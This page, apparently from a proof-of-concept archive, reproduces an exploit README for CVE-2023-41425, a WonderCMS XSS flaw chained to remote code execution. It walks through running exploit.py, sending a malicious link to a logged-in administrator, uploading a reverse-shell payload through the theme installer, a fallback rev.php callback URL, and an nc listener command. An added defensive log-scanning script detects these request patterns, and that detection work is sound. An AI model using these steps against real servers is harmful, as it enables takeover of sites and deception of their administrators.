Related vulnerability
Description
XSS injection, WonderCMS 3.2.0 - 3.4.2
Introduction
# CVE-2023-41425-WonderCMS-Authenticated-RCE
## Description
WonderCMS v3.2.0 - v3.4.2 is vulnerable to a cross-site scripting (XSS) flaw that remote attackers can chain into full control of the server (for educational purposes only). Here's the game plan:
## How it works
The exploit abuses the installModule component of WonderCMS to sneak in a crafted script that ends up running arbitrary code on the server.
## The Setup
* Tool: exploit.py
* What you need:
  - Target URL where WonderCMS is installed (no admin password required).
  - Your attacker machine's IP.
  - A port for your reverse shell listener.
## Step-by-Step Execution
1. The script generates a file called xss.js. This JavaScript weapon is designed to exploit reflected XSS.
2. It spits out a malicious link. You'll send that to the admin.
3. The magic happens when the admin (a logged-in user) opens or clicks your link:
   - Background requests fire without their consent.
   - A reverse shell payload is uploaded using the theme/plugin upload feature.
4. Once uploaded, the payload executes and grants you a reverse shell connection straight to the target server.
```sh
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
```
Example:
```sh
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
```
## Fail-Safe
If the reverse shell doesn't trigger automatically, just head over to:
```sh
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
```
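For defenders, here is an added example (not part of this README or the exploit repository) that scans web-server access log lines for the two request patterns this walkthrough relies on: a module being installed from a remote URL through installModule, and a PHP file under the theme/plugin directory being called with the lhost/lport parameters seen in the fail-safe URL. The sample log lines, IP addresses and the exact query-string form of installModule are constructed assumptions for the example, not data taken from the page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format). Hosts, timestamps
# and the "installModule=<url>" query form are assumptions for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /loginURL?installModule=http://203.0.113.7/revshell-main.zip HTTP/1.1" 200 87 "http://sea.htb/" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:12 +0000] "GET /themes/revshell-main/rev.php?lhost=203.0.113.7&lport=1234 HTTP/1.1" 200 0 "-" "python-requests/2.31"
10.0.0.8 - - [01/Jan/2024:10:01:00 +0000] "GET /themes/default/style.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Extracts source address, timestamp, method, request target and status code.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(target: str) -> list[str]:
    """Return the names of the detection rules matched by one request target."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = []

    # Rule 1: a PHP file served from the theme/plugin tree and called with the
    # lhost/lport parameters a reverse-shell callback uses (fail-safe URL above).
    if (parts.path.endswith(".php")
            and parts.path.startswith(("/themes/", "/plugins/"))
            and {"lhost", "lport"}.issubset(query)):
        hits.append("revshell_callback")

    # Rule 2: installModule pointed at a remote URL, i.e. a theme/plugin being
    # fetched from outside the server rather than a bundled module.
    for value in query.get("installModule", []):
        if value.lower().startswith(("http://", "https://")):
            hits.append("remote_module_install")
            break

    return hits


def scan_log(text: str) -> list[dict]:
    """Run every rule over each parsable log line; return one finding per hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        for rule in classify_request(m["target"]):
            findings.append({
                "line": lineno,
                "src": m["src"],
                "rule": rule,
                "path": urlsplit(m["target"]).path,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['rule']} from {f['src']} -> {f['path']}")
```

Both rules fire in sequence in the sample, which is the order a successful run of this chain would leave in the log; a single host tripping rule 2 and then rule 1 within seconds is a strong signal, whereas a lone remote installModule call may also be an administrator installing a theme and deserves review rather than an automatic alert.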
## Note
Remember to start a listener before running the exploit, on the same port you pass as <YOUR_PORT> (the example below uses 4444):
```sh
nc -lvp 4444
```
## Credit
prodigiousMind, for discovering and reporting the vulnerability: https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413
File snapshot
[4.0K] /data/pocs/f7f2d1be35c264f20b229602b2c820344b9f48c5
├── [3.0K] exploit.py
└── [1.6K] README.md
0 directories, 2 files
Notes
1. Accessing the code through the original source is recommended.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 (Shenlong) has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.